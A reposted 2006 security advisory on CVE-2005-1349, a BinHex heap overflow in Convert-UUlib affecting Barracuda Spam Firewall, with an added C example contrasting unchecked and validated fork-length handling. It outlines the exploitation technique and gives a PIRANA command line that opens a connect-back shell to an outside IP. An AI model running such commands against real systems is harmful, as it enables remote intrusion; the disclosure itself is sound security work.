Credit:
The information has been provided by Jean-Sébastien Guay-Leroux.
The original article can be found at:
http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt
Vulnerable Systems:
* Barracuda Spam Firewall with firmware releases before version 3.3.15.026.
The flaw is in the code that parses BinHex files. By supplying an invalid size for the resource fork or the data fork in the BinHex file header, an attacker can trigger a heap overflow.
By taking advantage of the sequential calls to free(), it is possible to overwrite more than 4 bytes. In fact, a jump stub can be written into memory that jumps through one of the registers holding the location of the shellcode. This technique makes the exploit considerably more reliable: the exploit code only needs to be supplied with a return-location address.
Remote administration access (port 8000) is NOT needed for successful exploitation.
For further details of the bugs, see the exploit code.
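The fork-size problem described above, as an added C illustration: this is example code written for this page, not code from the advisory, from PIRANA or from Convert-UUlib/uulib, and it does not reproduce uulib's actual decoder. It follows the public BinHex 4.0 header layout (name length, name, version, type, creator, flags, data fork length, resource fork length, header CRC, then each fork followed by its own 2-byte CRC); the function names, the fixed-capacity destination assumed by unchecked_fork_overrun and the constructed test headers are the example's own assumptions. The unchecked helper computes the overrun instead of performing the write, so the contrast with the checked extractor can be run safely.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* BinHex 4.0 header in its 8-bit form (after 6-bit and run-length decoding):
 *   1 byte name length (0..63), n bytes name, 1 byte version,
 *   4 bytes type, 4 bytes creator, 2 bytes Finder flags,
 *   4 bytes data fork length (big-endian), 4 bytes resource fork length (BE),
 *   2 bytes header CRC. Data fork, CRC, resource fork, CRC follow. */
struct binhex_header {
    uint8_t  name_len;
    char     name[64];
    uint8_t  version;
    char     type[4], creator[4];
    uint16_t flags;
    uint32_t data_len;   /* declared by the file, attacker-controlled */
    uint32_t rsrc_len;   /* declared by the file, attacker-controlled */
    uint16_t hdr_crc;
    size_t   consumed;   /* header bytes actually parsed */
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Parse the fixed header. Returns 0 on success, -1 if truncated or invalid. */
int binhex_parse_header(const uint8_t *buf, size_t len, struct binhex_header *h)
{
    if (len < 1 || buf[0] > 63)
        return -1;
    h->name_len = buf[0];
    if (len < (size_t)h->name_len + 22)   /* 1 + n + 1 + 4 + 4 + 2 + 4 + 4 + 2 */
        return -1;
    const uint8_t *p = buf + 1;
    memcpy(h->name, p, h->name_len);
    h->name[h->name_len] = '\0';
    p += h->name_len;
    h->version = *p++;
    memcpy(h->type, p, 4);    p += 4;
    memcpy(h->creator, p, 4); p += 4;
    h->flags    = be16(p);    p += 2;
    h->data_len = be32(p);    p += 4;
    h->rsrc_len = be32(p);    p += 4;
    h->hdr_crc  = be16(p);    p += 2;
    h->consumed = (size_t)(p - buf);
    return 0;
}

/* The vulnerable pattern: size the copy from the declared fork lengths and write
 * into a destination of fixed capacity (assumed here). This helper only computes
 * how many bytes such a copy would land past the end (0 = fits) rather than
 * performing it, so the demonstration itself stays memory-safe. */
size_t unchecked_fork_overrun(const struct binhex_header *h, size_t dst_cap)
{
    uint64_t total = (uint64_t)h->data_len + h->rsrc_len;
    return total > dst_cap ? (size_t)(total - dst_cap) : 0;
}

/* Hardened extraction: the declared lengths are checked against the bytes that
 * really follow the header before anything is allocated or copied. */
int binhex_extract_forks(const uint8_t *buf, size_t len, const struct binhex_header *h,
                         uint8_t **data, uint8_t **rsrc)
{
    *data = *rsrc = NULL;
    if (h->consumed > len)
        return -1;
    uint64_t remaining = len - h->consumed;
    uint64_t need = (uint64_t)h->data_len + 2 + (uint64_t)h->rsrc_len + 2; /* no 32-bit wrap */
    if (need > remaining)
        return -1;                    /* header lies about the fork sizes: reject */
    const uint8_t *p = buf + h->consumed;
    *data = malloc(h->data_len ? h->data_len : 1);
    *rsrc = malloc(h->rsrc_len ? h->rsrc_len : 1);
    if (!*data || !*rsrc) {
        free(*data); free(*rsrc); *data = *rsrc = NULL;
        return -1;
    }
    memcpy(*data, p, h->data_len);
    p += h->data_len + 2;             /* skip the data fork CRC */
    memcpy(*rsrc, p, h->rsrc_len);
    return 0;
}

/* Build a constructed 8-bit header for testing (name under 64 bytes; CRCs zero). */
size_t binhex_build_header(uint8_t *out, const char *name, uint32_t data_len, uint32_t rsrc_len)
{
    size_t n = strlen(name);
    uint8_t *p = out;
    *p++ = (uint8_t)n;
    memcpy(p, name, n);   p += n;
    *p++ = 0;                         /* version */
    memcpy(p, "TEXT", 4); p += 4;
    memcpy(p, "ttxt", 4); p += 4;
    *p++ = 0; *p++ = 0;               /* flags */
    for (int i = 3; i >= 0; i--) *p++ = (uint8_t)(data_len >> (8 * i));
    for (int i = 3; i >= 0; i--) *p++ = (uint8_t)(rsrc_len >> (8 * i));
    *p++ = 0; *p++ = 0;               /* header CRC */
    return (size_t)(p - out);
}
```

The point the example makes is that the declared fork lengths are untrusted input: a forged header can claim a resource fork of almost 4 GiB against a message that carries a handful of bytes, and any decoder that allocates or copies from those fields without comparing them to the data actually present is the kind of code the advisory describes. Doing the comparison in 64-bit arithmetic also closes the case where the two 32-bit lengths wrap when summed.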
Proof of concept:
Using the PIRANA framework, available at http://www.guay-leroux.com , it is possible to test the Barracuda Spam Firewall against the Convert-UUlib vulnerability.
Version 0.3.1 of the PIRANA framework adds a module that exploits the Convert-UUlib library bug. It contains three hardcoded offsets that should reliably exploit every Barracuda Spam Firewall with firmware below 3.3.15.026 and virus definitions below 2.0.325.
By calling PIRANA as shown below, you get a TCP connect-back shell on IP address 1.2.3.4, port 1234:
perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
    -l 1.2.3.4 -p 1234
CVE Information:
CVE-2005-1349
Disclosure Timeline:
* 2005-04-26 - Bug is disclosed by Mark Martinec and Robert Lewis.
* 2006-08-?? - Convert-UUlib module exploit written for PIRANA.
* 2006-11-28 - Barracuda Networks is notified about the problem.
* 2006-11-28 - Barracuda Networks acknowledged the problem.
* 2006-11-29 - Barracuda Networks published a fix.
* 2006-12-05 - Advisory is disclosed to the public.